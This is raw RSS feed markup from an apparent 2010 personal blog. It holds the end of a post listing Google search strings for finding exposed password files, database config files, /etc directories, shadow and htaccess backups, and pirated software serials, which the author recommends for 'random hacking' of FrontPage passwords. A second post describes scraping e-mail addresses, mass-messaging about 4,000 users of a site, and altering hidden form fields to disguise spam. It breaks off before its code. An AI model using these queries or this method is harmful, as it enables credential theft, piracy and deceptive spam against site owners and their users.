&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * intitle:&quot;Index of&quot; passwords modified&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * allinurl:auth_user_file.txt&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;access denied for user&quot; &quot;using password“&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;A syntax error has occurred&quot; filetype:ihtml&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * allinurl: admin mdb&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;ORA-00921: unexpected end of SQL command“&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * inurl:passlist.txt&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;Index of /backup“&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;Chatologica MetaSearch&quot; &quot;stack tracking:&quot; &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * inurl:passwd.txt&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; …and this one is just priceless…&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * “login: *” “password= *” filetype:xls&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Listings of what you want&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* change the word after the parent directory to what you want&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;parent directory &quot; DVDRip -xxx -html -htm -php -shtml -opendivx -md5  -md5sums&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;parent directory &quot;Xvid -xxx -html -htm -php -shtml -opendivx -md5  -md5sums&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;parent directory &quot; Gamez -xxx -html -htm -php -shtml -opendivx -md5  -md5sums&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;parent directory &quot; MP3 -xxx -html -htm -php -shtml -opendivx -md5  -md5sums&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;parent directory &quot; Name of Singer or album” -xxx -html -htm -php  -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Music (*this is already posted in another thread)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* You only need add the name of the song/artist/singer.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * Example: intitle:index.of mp3 jackson&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CD Images&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* inurl:microsoft filetype:iso&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * You can change the string to whatever you want, ex. Microsoft to  Adobe, .iso to .zip etc…&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* &quot;# -FrontPage-&quot; inurl:service.pwd FrontPage passwords.. very nice  clean search results listing !!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;*   &quot;AutoCreate=TRUE password=*&quot;  This searches the password for  &quot;Website Access Analyzer&quot;, a Japanese software that creates  webstatistics. For those who can read Japanese, check out the author&#39;s  site at: http://www.coara.or.jp/~passy/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Passwords in the URL&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* &quot;http://*:*@www&quot; domainname This is a query to get inline passwords  from search engines (not just Google), you must type in the query  followed with the domain name without the .com or .net  &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot;http://*:*@www&quot; gamespy or http://*:*@www”gamespy  &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * Another way is by just typing &quot;http://bob:bob@www&quot; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;IRC Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* &quot;sets mode: +k&quot; This search reveals channel keys (passwords) on IRC as  revealed from IRC chat logs. &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * eggdrop filetype:user user These are eggdrop config files. Avoiding a  full-blown discussion about eggdrops and IRC bots, suffice it to say  that this file contains usernames and passwords for IRC users.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Access Database Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* allinurl: admin mdb Not all of these pages are administrator&#39;s access  databases containing usernames, passwords and other sensitive  information, but many are!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;DCForum Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* allinurl:auth_user_file.txt DCForum&#39;s password file. This file gives a  list of (crackable) passwords, usernames and email addresses for  DCForum and for DCShop (a shopping cart program(!!!). Some lists are  bigger than others, all are fun, and all belong to googledorks.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;MySQL Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* intitle:&quot;Index of&quot; config.php&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * This search brings up sites with &quot;config.php&quot; files. To skip the  technical discussion, this configuration file contains both a username  and a password for an SQL database. Most sites with forums run a PHP  message base. This file gives you the keys to that forum, including FULL  ADMIN access to the database.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The ETC Directory&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* intitle:index.of.etc &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * This search gets you access to the etc directory, where many, many,  many types of password files can be found. This link is not as reliable,  but crawling etc directories can be really fun!&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Passwords in backup files&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;*filetype:bak inurl:&quot;htaccess|passwd|shadow|htusers&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * &quot; This will search for backup files (*.bak) created by some editors or  even by the administrator himself (before activating a new  version). Every attacker knows that changing the extension of a file on a  web server can have ugly consequences.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Serial Numbers&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* Let&#39;s pretend you need a serial number for Windows XP Pro.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * In the Google search bar type in just like this - &quot;Windows XP  Professional&quot; 94FBR&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * the key is the 94FBR code.. it was included with many MS Office  registration codes so this will help you dramatically reduce the amount  of &#39;fake&#39; sites (usually pornography) that trick you.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; * or if you want to find the serial for WinZip 8.1 - &quot;WinZip 8.1&quot; 94FBR&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;These are only a sample of some of the fun things you can do with the  wrong kind of Google search. Such strings return very random results,  and are of very little use for targeted attacks. But for random hacking  of peoples Frontpage password&#39;s, it&#39;s priceless.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;* inurl:(service | authors | administrators | users) ext:pwd &quot;#  -FrontPage-&quot;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;   &lt;td&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Cast your vote on this article-&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/google-hacking-codes.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgssB0H6M-MaNMWZ-3S5r-4np0IDZb5R9oRdPvB1pFfViyUF1BexZXE8U1Tl8J7euAV0Xy_gGG7sVtaYLtigXi6RlXkU0TRtO-pYkLmR_BbSdG4-vd5d__hf1TXnw9X1jTuNG8-rFUMl50/s72-c/google.jpg" height="72" width="72"/><thr:total>10</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6508590417342071171</guid><pubDate>Thu, 11 Nov 2010 18:40:00 +0000</pubDate><atom:updated>2010-11-17T06:59:14.572-08:00</atom:updated><title>Hacking the DOM of a site using Superscript</title><description>&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;color: lime;&quot;&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9bLqS7RkVHjFhEjsT5bVpL0xjGedAjThIqq9ilAwKPCY4IIGekufsbp9YG-4vLEE3oOMldM7V7baRrnU55t-tULPBKcUXk1TQC_tqEXLtNNTkzcUucWWF1pge5Ur09jjacy4Td3AT9w/s1600/dom.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9bLqS7RkVHjFhEjsT5bVpL0xjGedAjThIqq9ilAwKPCY4IIGekufsbp9YG-4vLEE3oOMldM7V7baRrnU55t-tULPBKcUXk1TQC_tqEXLtNNTkzcUucWWF1pge5Ur09jjacy4Td3AT9w/s1600/dom.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;     &lt;/span&gt;&lt;/i&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;br /&gt;
&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;For this Article, I will be using the program I&#39;ve  created specifically for doing this... &lt;a href=&quot;http://www.newsbubbles.org/webdom/&quot;&gt;webDOMinator 1.0&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;&lt;i&gt;Intro&lt;/i&gt;&lt;/h2&gt;&lt;br /&gt;
The scripting standard that I&#39;m using is my own language I created for  performing super-scripting on web pages.  Super-scripting allows you  direct access to change and read elements from the Document Object Model  (or DOM) of a web page that you&#39;re viewing.  The coding language has  been dubbed &quot;Minion&quot; because it&#39;s like having a little programmed minion  to do your bidding online.  I call it a super-scripting language  because it&#39;s not a script that exists inside of the web browser being  used, it exists outside, and can control the browser and what is inside  of it as well.&lt;br /&gt;
&lt;br /&gt;
Let&#39;s look at an example of a simple minion script just to show you how  it works.&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;navigate:www.google.com&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; click:dom.a.Images&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; pagewait&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.q.value=monkey foo&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; submit:dom.form.1&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt; &lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
This code is not really that useful to me, but it serves the purpose of  it&#39;s example.  The first line &lt;i&gt;navigate:www.google.com&lt;/i&gt; simply does  what it looks like it does... navigates the web browser to google.  The  second line makes the system click on the &quot;Images&quot; link in the DOM  structure.  The third line tells webDOM to wait for the page to load  before performing the next action. Why did I not need this between the  first and second lines too?  Because the system automatically figures on  a &lt;b&gt;navigate&lt;/b&gt; command, that it will be waiting until the next page  to load to perform the next action.  The fourth line is a property  setting.  It tells webDOM to change the &lt;b&gt;value&lt;/b&gt; property of the dom  element &lt;b&gt;dom.input.q&lt;/b&gt; to be equal to &quot;monkey foo&quot;.  I&#39;ll explain  how this works in a bit.  The fourth line of course, submits the first  form on the page.&lt;br /&gt;
&lt;br /&gt;
Now your question might be: Why do you use two different ways to  reference or access a DOM element?  Well, that&#39;s simple, webDOM has the  ability to reference DOM elements both by their name, and by their  sequential index in the DOM list for that element type.  In the above  example code, I say CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;dom.input.q.value&lt;/tt&gt;&lt;/div&gt;,  and that is a direct reference to the &lt;i&gt;value&lt;/i&gt; property of the &lt;i&gt;input&lt;/i&gt;  element named &lt;i&gt;q&lt;/i&gt;.  Dom is simply to specify that I want to use  something from the web page DOM that the browser is currently on.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;&lt;i&gt;A Working Example&lt;/i&gt;&lt;/h2&gt;&lt;br /&gt;
&lt;h3&gt;&lt;i&gt;The Situation&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;
Now let&#39;s look at how this tool can be applied to a real world task.  I  have a client, who&#39;s name I will not disclose, but they needed some free  advertising... they wanted to do an e-mail campaign spam.  The way they  had been doing it was that they would go out and find e-mail addresses  of counselors listed on edu websites and putting those into an excel  sheet, etc. etc... in other words, the really slow manual way.  I  decided to start collecting e-mails for them.  &lt;br /&gt;
&lt;br /&gt;
I used siteBore to get a majority of the e-mails from certain websites  within their target market, (siteBore is webDOM&#39;s information gathering  spider... scrapes pages for DOM info or e-mails in a spidering  environment.)  There were a couple of specific sites that I found that  did not list e-mails, but had thousands of people in my target market.   Instead, since these people needed to be contacted directly by the  public as part of their job and the services of that site, the website  decided to offer a messaging system that included a form for messaging.   They also had an index of different states in the country that had  lists of all of their users.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;&lt;i&gt;The Attack Plan&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
So, using the other tools in webDOM like it&#39;s automated user list  population tool, and it&#39;s mass PMing system, I started gathering a large  list of about 4,000 of their users.  After I started trying to send  messages to them, I noticed that I could not change the subject of the  message.  This was a hidden field on the message form and it was set to  something like &quot;A Contact on x.com needs your help&quot;. Not only that, but I  couldn&#39;t change the name of the contact, it just said: &quot;x.com contact  form&quot;.  I figured that if I was advertising services for their  competitors using their own message forms, that the target market would  not be set up to receive the message in the right context, that of a  better alternative :).  So I simply wrote a script that changed that  element of the form, since it was provided in the DOM tree :).  By the  way, this is an example of lazy programmers once again.  They could&#39;ve  easily just changed the form for non-logged in users to not include the  subject and contact, then include it later on in the code.  But oh well,  their loss.  Anyway, here&#39;s the code I used:&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
